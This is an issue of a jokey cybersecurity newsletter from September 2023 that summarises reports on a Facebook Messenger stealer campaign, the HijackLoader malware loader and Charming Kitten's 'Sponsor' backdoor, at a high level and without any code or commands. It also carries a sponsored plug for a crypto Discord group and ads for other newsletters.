Facebook Messenger Phishing Attack Alert!

Sep 13 2023

Gone Phishing Banner

Welcome to Gone Phishing, your daily cybersecurity newsletter that thinks cybercrime is Kim Jung Unacceptable ๐Ÿ™ˆ Heโ€™s meeting with Putin! Heโ€™s meeting with Putin! ๐Ÿ’€๐Ÿ’€๐Ÿ’€

Todayโ€™s hottest cybersecurity news stories:

  • ๐Ÿ‘จโ€๐Ÿ’ป Facecrook: Vietnamese hackers unleash python-based stealer via FB ๐Ÿ

  • โœˆ๏ธ Introducing HijackLoader, the modular loader that everybodyโ€™s talking about ๐Ÿ—ฃ๏ธ

  • ๐Ÿˆ This kittyโ€™s got claws. Charming Kitten is back using โ€˜Sponsorโ€™ backdoor ๐Ÿšช

Hackers: This is Vietnameasy lemon squeezy ๐Ÿคฆ

๐Ÿ“ฃ Facebook Messenger Phishing Attack Alert!

๐Ÿšจ New Threat Alert:

A dangerous phishing attack is making waves on Facebook Messenger, using a swarm of fake and hijacked personal accounts to target your business accounts! ๐Ÿ˜ฑ

๐Ÿง The Details:

Researchers at Guardio Labs have uncovered this threat, originating from a Vietnamese-based group known as MrTonyScam. They employ a sneaky tactic involving tiny compressed file attachments, leading to a multi-stage process with obfuscation methods.

๐Ÿ“‚ Victims receive enticing messages with RAR and ZIP archive attachments.

These unleash a dropper fetching the next stage from GitHub or GitLab. This payload hides an obfuscated Python-based stealer, stealing login credentials and cookies from web browsers.

๐Ÿช Here's the kicker:

The attackers delete stolen cookies, locking victims out of their own accounts. Then, they change passwords and seize control!

๐ŸŒ Global Impact:

While most attacks have hit the U.S., Australia, Canada, and more, no one is immune. Guardio Labs estimates 1 in 250 victims were infected in the last month.

๐Ÿ’ก Why Facebook?

Cybercriminals can monetize compromised Facebook accounts easily. They use them to spread scams and ads to a broad audience.

๐Ÿค Collaborative Threats:

This isn't the only recent Facebook threat. Experts note overlaps and connections among these threat actors, suggesting a coordinated effort or service-oriented cybercriminal ecosystem centred around social media platforms.

๐Ÿ“ข Stay vigilant!

Educate yourself and your team to avoid falling prey to MrTonyScam and similar threats. Protect your business accounts, and report any suspicious activity.

I came across ZZZ money club during the crypto market bull run when everyoneโ€™s a winner, even during the bear market this discord group has been amazing at giving information on projects and ways to make passive income in various ways.

The group is very active and everyone in this private discord group is very chatty and helpful.

Its run by Yourfriendandy and Decadeinvestor, you can find them here on YouTube, both top guys with great content.

If you are interested in joining the group you can through the link below.

Jesus, you canโ€™t say HijackLoader on 9/11 (or the day after)!! #NeverForget ๐Ÿ˜ญ

๐Ÿšจ HijackLoader like Micah Richards has burst on the scene! ๐Ÿ˜ณ

๐Ÿฆ  The Threat:

A dangerous malware loader called HijackLoader is making waves in the cybercriminal world, delivering payloads like DanaBot, SystemBC, and RedLine Stealer.

๐Ÿค– What Makes It Dangerous:

Despite its lack of advanced features, HijackLoader's modular architecture allows it to use various modules for code injection and execution. This flexibility sets it apart from most loaders.

๐Ÿ•ต๏ธ Under the Radar:

This malware uses syscalls to avoid security monitoring, tracks and blocks security-related processes, and delays code execution by up to 40 seconds to avoid detection.

๐Ÿ”’ Persistence:

HijackLoader creates a shortcut file in the Windows Startup folder, ensuring it stays active on compromised hosts.

๐Ÿ‘Ž Quality Concerns:

While it's a modular loader with evasion techniques, experts note the code quality is poor.

๐ŸŒ Evolving Threat Landscape:

In addition to HijackLoader, there's a rising trend of information-stealing malware like RisePro, which promises more control for users. A new Node.js-based stealer, distributed via fake Facebook ads, is also targeting Chromium-based browsers.

๐Ÿ” Implications:

These developments show the ever-evolving cybercrime landscape, with stealers being a common initial attack vector for threat actors. This highlights the importance of robust cybersecurity measures.

๐Ÿ›ก๏ธ Stay Protected:

Keep your systems updated, use reputable security software, and educate your team to recognize and avoid suspicious content. Be vigilant in this constantly changing threat environment!

๐Ÿ—ž๏ธ Extra, Extra! Read all about it! ๐Ÿ—ž๏ธ

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • โœˆ๏ธ ViaTravelers: Get exclusive travel tips, news, and insider deals right in your inbox.

  • ๐ŸŒย Leadership in Tech: A weekly newsletter for CTOs, engineering managers and senior engineers to become better leaders.

  • ๐Ÿง ย Big Brain: Trending AI news, jobs and tools delivered in 3 minutes per day.

Let us know what you think!

Charming Kitten goes โ€˜Ballisticโ€™, U.A.E. atrocious ๐Ÿ˜ฌ

๐ŸŒ Charming Kitten Strikes Again! ๐Ÿ˜บ

๐Ÿ” The Threat:

The Iranian cyber threat group Charming Kitten is back in action, targeting entities in Brazil, Israel, and the U.A.E. Their weapon of choice? A previously unknown backdoor called "Sponsor."

๐Ÿฆ  Code Name:

This campaign is being tracked by a Slovak cybersecurity firm as "Ballistic Bobcat." Their targets primarily include education, government, healthcare organisations, as well as human rights activists and journalists.

๐ŸŽฏ Victims Detected:

So far, at least 34 victims have been identified, with the attacks dating back to September 2021.

๐Ÿ’ผ How It Works:

Sponsor uses sneaky configuration files, deployed discreetly to appear harmless and evade detection. The attackers gain initial access by exploiting known vulnerabilities in Microsoft Exchange servers.

๐ŸŒ Global Reach:

This campaign is not limited by borders. It has affected organisations in multiple countries, echoing previous advisories by Australia, the U.K., and the U.S. in November 2021.

๐Ÿ›ก๏ธ Stay Safe:

Cybersecurity is crucial. Keep your systems updated, patch known vulnerabilities, and educate your team to recognize potential threats.

Charming Kitten's tactics may evolve, but with vigilance, you can protect your organisation!

So long and thanks for reading all the phish!

Recent articles